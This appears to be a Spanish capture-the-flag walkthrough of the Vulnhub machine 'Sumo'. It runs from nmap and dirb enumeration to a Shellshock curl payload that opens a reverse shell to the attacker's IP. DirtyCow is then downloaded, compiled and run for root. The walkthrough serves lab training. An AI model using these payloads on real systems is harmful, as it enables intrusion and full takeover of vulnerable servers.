[VLN] Sumo

Hoy vamos a hackear la maquina de Vulnhub llamada Sumo. Podeis descargarla desde el siguiente enlace: Sumo

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 12:18 CEST
Nmap scan report for ubuntu.home (192.168.1.104)
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.88 seconds
Vamos a ver si encontramos algo en el puerto 80... En el primer escaneo, usando el siguiente comando: dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt Nos ha aparecido el directorio /cgi-bin, asi que vamos a ver si vemos algo mas dentro...

sml@Cassandra:~$ dirb http://192.168.1.104/cgi-bin 
/usr/share/wordlists/dirb/big.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Sat May 16 12:44:01 2020
URL_BASE: http://192.168.1.104/cgi-bin/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------

GENERATED WORDS: 20458                                                         
---- Scanning URL: http://192.168.1.104/cgi-bin/ ----
+ http://192.168.1.104/cgi-bin/test (CODE:200|SIZE:14)                          
                                   
---------------
END_TIME: Sat May 16 12:44:14 2020
DOWNLOADED: 20458 - FOUND: 1
Encontramos /cgi-bin/test... La VM parece estar muy anticuada asi que vamos a probar con shellshock.

Exploitation


Ponemos nuestro nc a la escucha..

sml@Cassandra:~$ nc -nlvp 5555
Y desde otro terminal lanzamos lo siguiente:

sml@Cassandra:~$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash 
-i >& /dev/tcp/192.168.1.148/5555 0>&1'" http://192.168.1.104/cgi-bin/test
Y obtenemos la shell :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.104] 40918
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$
www-data@ubuntu:/usr/lib/cgi-bin$ python -c 'import pty; pty.spawn("/bin/sh")'

Privilege Escalation


Una vez dentro, vemos que el sistema tiene un kernel bastante antiguo asi que probamos con el exploit dirtycow. https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7 1c902f55c09aa8ced351690e1e627363c231b45/c0w.c Lo descargamos y compilamos en nuestra maquina!

sml@Cassandra:~$ wget 
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7
1c902f55c09aa8ced351690e1e627363c231b45/c0w.c
--2020-05-17 15:48:15--  
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7
1c902f55c09aa8ced351690e1e627363c231b45/c0w.c
Resolviendo gist.githubusercontent.com (gist.githubusercontent.com)... 
151.101.132.133
Conectando con gist.githubusercontent.com 
(gist.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 4368 (4,3K) [text/plain]
Grabando a: “c0w.câ€

c0w.c                100%[======================>]   4,27K  --.-KB/s    en 0s   
   
2020-05-17 15:48:16 (25,2 MB/s) - “c0w.c†guardado [4368/4368]

sml@Cassandra:~$ gcc -pthread c0w.c  -o c0w
c0w.c: In function ‘main’:
c0w.c:103:3: warning: implicit declaration of function ‘asprintf’; did you 
mean ‘vsprintf’? [-Wimplicit-function-declaration]
  103 |   asprintf(&backup, "cp %s /tmp/bak", suid_binary);
      |   ^~~~~~~~
      |   vsprintf
c0w.c:104:3: warning: implicit declaration of function ‘system’ 
[-Wimplicit-function-declaration]
  104 |   system(backup);
      |   ^~~~~~
sml@Cassandra:~$ cp c0w /var/www/html
Una vez compilado, ponemos el binario en nuestro servidor web para poder descargarlo desde la maquina "victima".

www-data@ubuntu:/tmp$ wget http://192.168.1.148/c0w
wget http://192.168.1.148/c0w
--2020-05-17 06:48:48--  http://192.168.1.148/c0w
Connecting to 192.168.1.148:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17904 (17K) [application/octet-stream]
Saving to: `c0w'

     0K .......... .......                                    100%  424M=0s

2020-05-17 06:48:48 (424 MB/s) - `c0w' saved [17904/17904]
Damos permisos de ejecucion y ejecutamos.

www-data@ubuntu:/tmp$ chmod +x c0w
$ ./c0w

                                
   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, //usr/bin/passwd                          
     //    //                              
    ^^    ^^                               
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 35d2c000

madvise 0

ptrace 0

$
Ahora solo nos falta ejecutar "passwd"...

$ /usr/bin/passwd
/usr/bin/passwd
root@ubuntu:/tmp# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

root.txt



root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt
{Sum0-SunCSR-2020_r001}

End


Y con esto ya seriamos root de la maquina :)